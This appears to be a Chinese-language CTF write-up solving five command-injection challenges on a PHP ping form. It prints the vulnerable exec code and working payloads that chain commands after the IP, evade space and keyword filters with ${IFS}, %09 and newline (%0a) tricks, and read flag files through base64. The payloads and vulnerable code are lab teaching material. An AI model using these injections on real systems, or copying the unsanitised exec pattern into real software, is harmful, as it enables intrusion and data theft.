目录
CTF-01
CTF-02
CTF-03
CTF-04
CTF-05
CTF-01
测试回显
Array
(
[0] => PING 127.0.0.1 (127.0.0.1): 56 data bytes
[1] => 64 bytes from 127.0.0.1: seq=0 ttl=42 time=0.028 ms
[2] => 64 bytes from 127.0.0.1: seq=1 ttl=42 time=0.059 ms
[3] => 64 bytes from 127.0.0.1: seq=2 ttl=42 time=0.065 ms
[4] => 64 bytes from 127.0.0.1: seq=3 ttl=42 time=0.060 ms
[5] =>
[6] => --- 127.0.0.1 ping statistics ---
[7] => 4 packets transmitted, 4 packets received, 0% packet loss
[8] => round-trip min/avg/max = 0.028/0.053/0.065 ms
)
?ip=127.0.0.1;ls
Array
(
[0] => PING 127.0.0.1 (127.0.0.1): 56 data bytes
[1] => 64 bytes from 127.0.0.1: seq=0 ttl=42 time=0.040 ms
[2] => 64 bytes from 127.0.0.1: seq=1 ttl=42 time=0.058 ms
[3] => 64 bytes from 127.0.0.1: seq=2 ttl=42 time=0.063 ms
[4] => 64 bytes from 127.0.0.1: seq=3 ttl=42 time=0.068 ms
[5] =>
[6] => --- 127.0.0.1 ping statistics ---
[7] => 4 packets transmitted, 4 packets received, 0% packet loss
[8] => round-trip min/avg/max = 0.040/0.057/0.068 ms
[9] => 858195988072.php
[10] => index.php
)
?ip=127.0.0.1;cat 858195988072.php|base64
解码拿到flag
CTF-02
<?php
$res = FALSE;
if (isset($_GET['ip']) && $_GET['ip']) {
$ip = $_GET['ip'];
$m = [];
if (!preg_match_all("/cat/", $ip, $m)) {
$cmd = "ping -c 4 {$ip}";
exec($cmd, $res);
} else {
$res = $m;
}
}
?>cat更多绕过如下
cat 由第一行开始显示内容,并将所有内容输出tac 从最后一行倒序显示内容,并将所有内容输出more 根据窗口大小,一页一页的现实文件内容less 和 more 类似,但其优点可以往前翻页,而且可以搜索字符head 只显示头几行tail 只显示最后几行nl 类似于 cat -n ,显示时输出行号
CTF-03
<?php
$res = FALSE;
if (isset($_GET['ip']) && $_GET['ip']) {
$ip = $_GET['ip'];
$m = [];
if (!preg_match_all("/ /", $ip, $m)) {
$cmd = "ping -c 4 {$ip}";
exec($cmd, $res);
} else {
$res = $m;
}
}
?>空格绕过如下
IFS$9 、 %09 、 < 、 > 、 <> 、 {,} 、 %20 、 ${IFS}
127.0.0.1;cat${IFS}flag_26686108321431.php|base64
CTF-04
本题过滤目录分隔符
127.0.0.1;ls flag_is_here
[9] => flag_45342181814693.php127.0.0.1;cd flag_is_here;cat flag_45342181814693.php|base64
CTF-05
if (!preg_match_all("/(\||&|;| |\/|cat|flag|ctfhub)/", $ip, $m)) {
$cmd = "ping -c 4 {$ip}";
exec($cmd, $res);
} %0a:回车
%0d:换行
payload 绕过
?ip=127.0.0.1%0acd${IFS}f***_is_here%0aless${IFS}f***_1791377478478.php
![[附源码]Node.js计算机毕业设计-高校人事管理系统Express](https://img-blog.csdnimg.cn/370b38a0df8a4288810898262d387c1b.png)
